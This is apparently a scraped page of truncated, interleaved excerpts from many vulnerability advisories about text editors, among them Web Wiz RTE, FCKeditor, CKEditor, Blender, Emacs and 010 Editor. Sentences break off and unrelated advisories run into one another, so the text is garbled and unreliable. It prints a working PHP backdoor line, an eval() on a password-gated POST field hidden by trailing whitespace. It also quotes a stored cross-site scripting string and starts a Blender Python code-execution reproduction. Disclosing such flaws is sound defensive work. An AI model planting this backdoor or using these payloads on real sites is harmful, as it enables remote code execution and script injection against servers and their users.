Text Editor
-######### [Saved] - [27-07-2008/13:10:02]
# .: Multiple Cross-Site Scripting Vulnerabilities in Web Wiz Rich Text Editor version 4.02
# .: [Author] CSDT
# .: [Affected versions] http://www.webwizguide.com/ - Web Wiz Rich Text Editor (RTE) 4.02
# .: [Credit] The disclosure of these issues has been credited to autehoker of CSDT
# _____________________________________________________________________________________________ˆ
# .: [Script Description]
# (Description Provided by CVE) : Multiple cross-site scripting (XSS) vulnerabilities in
# Web Wiz Rich Text Editor (RTE) 4.02 and earlier, and 3.x versions, allow remote attackers
# to inject arbitrary web scripting. This flaw exists because the application does not validate
2. PRODUCT DESCRIPTION
Based on the powerful editing component Scintilla, Notepad++ is the
most powerful and famous open-source text editor written in C++
and uses pure Win32 API and STL which ensures a higher execution speed
and smaller program size. By optimizing as many routines as
possible without losing user friendliness, Notepad++ is trying to
reduce the world carbon dioxide emissions. When using less
CPU power, the PC can throttle down and reduce power consumption,
full control of the machine where Blender is installed sending a
specially crafted .blend file and enticing the user to open it.
These are the steps to reproduce the issue:
. Open the "Text Editor" Panel.
. Right click on the canvas and select "New".
. Write your python code there. For instance:
/-----
import os
########################## WwW.BugReport.ir
###########################################
#
# AmnPardaz Security Research Team
#
# Title: Web Wiz Rich Text Editor(TM)
# Vendor: http://www.webwizguide.com/
# Bug: Directory traversal + HTM/HTML file creation on the server
# Vulnerable Version: 4.0
# Exploit: Available
# Fix Available: No! Fast Solution is available.
TITLE: jQuery Lightweight Rich Text Editor (lwrte) Plugin uploader.php Arbitrary File Upload
PRODUCT: jQuery Lightweight Rich Text Editor (lwrte) Plugin
PRODUCT URL 1: http://code.google.com/p/lwrte/
PRODUCT URL 2: http://plugins.jquery.com/project/lwRTE
CHECKED VERSIONS: 1.2
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
BUG:
Changing the Management Console Username and Password
+----------------------------------------------------
Complete these steps:
1. Open the following file in a text editor:
$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
fgconsole.war/users.properties
Use the line admin=admin to set the username and password. The
Background
==========
TRAMP is a remote file editing package for GNU Emacs, a highly
extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
3. Problem Description
a. Updated ESX patch updates Service Console package ed
ed is a line-oriented text editor, used to create, display, and
modify text files (both interactively and via shell scripts).
A heap-based buffer overflow was discovered in the way ed, the GNU
line editor, processed long file names. An attacker could create a
file with a specially-crafted name that could possibly execute an
user-assisted attackers to execute arbitrary code.
Background
==========
XEmacs is a highly extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
010 Editor Multiple Buffer Overflow Vulnerabilities
1. General Information
010 Editor is a text editor and hex editor, with a lot of functions as
view and edit binary files, analyze and edit binary data, import and
export binary data in many different formats.
Bkis has just found many vulnerabilities in the software, related to the
processing of 010 Editor Binary Template files (“.bt”) and 010 Editor
#2009-007 FCKeditor input sanitization errors
Description:
FCKeditor, a web based open source HTML text editor, suffers from a remote
file upload vulnerability.
The input of several connector modules is not properly verified before being
used, this leads to exposure of the contents of arbitrary directories on the
server filesystem and allows file uploading to arbitrary locations. The
arbitrary code.
Background
==========
gedit is a text editor for the GNOME desktop.
Affected packages
=================
-------------------------------------------------------------------
How to determine if you are affected:
1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the
"C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is
vulnerable.
Workaround: None
execution of arbitrary code.
Background
==========
GNU Emacs is a highly extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
Backdoor in file:
/php/modules/entries/search.cache.inc.php
line 8:
$cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash . '_info.dat';
if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ'){@eval(@stripslashes($_POST['e']));exit;};
the second string is hidden at the very right site with whitespaces in the texteditor, so nobody had seen it before,
the function is called in:
/php/modules/entries/search.main.inc.php
exploit:
-->
Application: Obedit
Version: 3.03
Vendor: http://www.oblius.com/?projects.obedit
Description:
obedit is a Flash-based rich text editor. It will allow a user to edit text much like you would in an office-like application, with simple editing features like bold, italic, justification, block indents, text color, font and size selection, links, bullets, background color, and spell checking.
--------------------
Vulns:
--------------------
Versions Affected: 3.0 - 3.6.2 (Developers confirm all versions since 3.0
are affected.)
Info:
CKEditor is a text editor to be used inside web pages. It's a WYSIWYG
editor, which
means that the text being edited on it looks as similar as possible to the
results users
have when publishing it. It brings to the web common editing features
found on desktop
Technical Explanation
=====================
The string below is not properly sanitized when the web page is saved
after adding a picture using the application's text editor:
"""></P></div></td><script>alert("bingo");</script>
The text between the script tags will be injected into the page upon
each successful edit and save operation, after the page is initially
How to determine if you are affected:
1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the
"C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is
vulnerable.
Workaround: None
|
